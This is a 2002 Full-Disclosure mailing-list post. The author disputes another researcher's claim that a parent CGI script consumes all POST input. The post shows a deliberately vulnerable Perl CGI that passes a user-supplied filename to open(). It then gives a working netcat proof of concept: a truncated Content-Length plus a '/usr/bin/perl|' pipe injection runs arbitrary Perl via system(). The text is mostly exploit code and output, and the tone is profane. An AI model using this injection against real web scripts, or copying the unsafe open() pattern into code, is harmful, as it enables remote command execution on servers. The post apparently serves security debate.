[Full-Disclosure] PR0V1NG RFP WR0NG

From: full-disclosure@lists.netsys.com
Date: 08/27/02 

From: full-disclosure@lists.netsys.com (full-disclosure@lists.netsys.com)
Date: Tue, 27 Aug 2002 13:00:10 -0700

> - - That ~el8 sympathizer got it wrong. It was not a blunder, and it still
> holds true:

> The Phrack article discusses how to pass parameters to a program exec'd
> *FROM WITHIN* a CGI. You can not pass POST parameter (STDIN) to these
> applications because the parent CGI reads in and parses STDIN before the
> sub-application is executed. The ~el8 sympathizer was talking about
> executing the CGI itself. Two different things.

Our esteemed web security expert doesn't know how to play around with
Content-Length properly. Ok, let's test the theory.

We download thttpd and run it like so...

bash-2.05a$ ./thttpd -D -p 6767 -c "/cgi-bin/*"

And in our cgi-bin directory we create a rudimentary script that reads only
POST data and parses it in a manner consistent with almost every Perl script
on the Net...

--------------------------------------------------------------------------------
bash-2.05a$ cat myscript.pl
#!/usr/bin/perl

read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});

@zzz = split(/&/, $buffer);
foreach $xxx (@zzz) {
    ($var, $val) = split(/=/, $xxx);
    $val =~ tr/+/ /;
    $val =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    $form{$var} = $val;
}

$file = $form{'filename'};

open(F, "$file");
#@heh = <F>;
close(F);

#print "Content-Type: text/plain\r\n\r\n";
#print @heh;
--------------------------------------------------------------------------------

Now you're saying the parent CGI consumes STDIN and hence there is no way
for STDIN to be fed to the sub-application (a sub-application such as
/usr/bin/perl).

This is incorrect.

I'm going to make the 'filename' variable equal "/usr/bin/perl|". So the
POST data looks like this:

filename=/usr/bin/perl|

That has a length of 23 characters, so we make Content-Length 23. But there
is nothing stopping us from sending in more data after the 23 characters --
data that WILL be fed to the sub-application, which you say can't happen.

--------------------------------------------------------------------------------
bash-2.05a$ nc localhost 6767
POST /cgi-bin/myscript.pl HTTP/1.0
Content-Length: 23

filename=/usr/bin/perl|
system("echo owned > /tmp/fuckwhitehatz");
^C punt!
bash-2.05a$ cat /tmp/fuckwhitehatz
owned
--------------------------------------------------------------------------------

On closer inspection, the Novell advisory has nothing to do with this. I
apologize. But you are still wrong on other accounts.

Parent CGI = myscript.pl, yes it reads in and parses STDIN as you said.

sub-application = /usr/bin/perl -- I still managed to get STDIN fed to it
for the running of arbitrary Perl scripts, which makes your comment below
false.

> You can not pass POST parameter (STDIN) to these applications because the
> parent CGI reads in and parses STDIN before the sub-application is
> executed.

Get your free encrypted email at https://www.hushmail.com

Quantcast